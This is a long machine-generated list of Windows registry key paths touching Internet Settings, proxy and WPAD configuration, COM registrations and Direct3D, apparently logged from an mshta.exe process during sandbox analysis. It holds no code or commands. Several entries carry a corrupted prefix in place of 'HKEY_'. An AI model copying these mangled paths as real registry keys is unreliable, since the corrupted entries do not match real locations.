HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SqmHttpStreamRandomUploadPoolSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
\x6e08\x160EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ClientAuthBuiltInUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ScavengeCacheLowerBound
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLifeTime
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\ScavengeCacheFileLimit
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_NOTIFY_UNVERIFIED_SPN_KB2385266
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_COMPAT_USE_CONNECTION_BASED_NEGOTIATE_AUTH_KB2151543
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
\x6e08\x160EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WpadSearchAllDomains
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SCH_SEND_AUX_RECORD_KB_2618444
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
\x6e08\x160EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
\x6e08\x160EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxySettingsPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableLegacyAutoProxyFeatures
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UseFirstAvailable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CombineFalseStartData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableFalseStartBlocklist
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnforceP3PValidity
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DuoProtocols
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSpdyDebugAsserts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
\x6e08\x160EY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings
\x6e08\x160EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\http\
HKEY_CLASSES_ROOT\PROTOCOLS\Name-Space Handler\*\
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_XSSFILTER\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Compatible
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Version
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Pre Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Pre Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Platform
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MAXCONNECTIONSPER1_0SERVER\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_URLMON_IQDA_SIZE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_URLMON_IQDA_SIZE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_USE_BUILTIN_ACCEPT_HEADERS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MIME_USE_BUILTIN_ACCEPT_HEADERS
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\UrlMon Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableUTF8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\UrlEncoding
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Control Panel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Control Panel
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Control Panel\UTF8URLQuery
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Control Panel
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\BrowserStorage\AppCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\BrowserStorage\AppCache
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserStorage\AppCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\BrowserStorage\AppCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\Compatibility\msHta.Exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\EnableAnchorContext
HKEY_CLASSES_ROOT\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\Interface\{332C4425-26CB-11D0-B483-00C04FD90119}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{332C4425-26CB-11D0-B483-00C04FD90119}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{332C4425-26CB-11D0-B483-00C04FD90119}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020424-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{332C4425-26CB-11D0-B483-00C04FD90119}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{26656EAA-54EB-4E6F-8F85-4F0EF901A406}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{8A40A45D-055C-4B62-ABD7-6D613E2CEAEC}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME\mshta.exe
HKEY_CURRENT_USER\Software\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{55272A00-42CB-11CE-8135-00AA004BB851}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_CURRENT_USER\Software\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BCD1DE7E-2DB1-418B-B047-4A74E101F8C1}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{2A1C9EB2-DF62-4154-B800-63278FCB8037}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadExpirationDays
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecision
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDecisionReason
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDhcp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDns
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-6f-d4-05\WpadDetectedUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\52-54-00-6f-d4-05
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9F64103F-F384-44A8-88B3-DFA27402741D}\WpadNetworkName
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Linkage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Linkage\Export
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ClientCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Direct3D
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\DriverCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DriverCompat\Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DriverCompat\Name
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\Drivers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\Drivers\Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\Drivers\Name
HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\DX6TextureEnumInclusionList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DX6TextureEnumInclusionList\Size
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DX6TextureEnumInclusionList\Name
HKEY_CURRENT_USER\Software\Microsoft\DXGI
HKEY_LOCAL_MACHINE\Software\Microsoft\DXGI
HKEY_CURRENT_USER\EUDC\1252
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\OperationalData
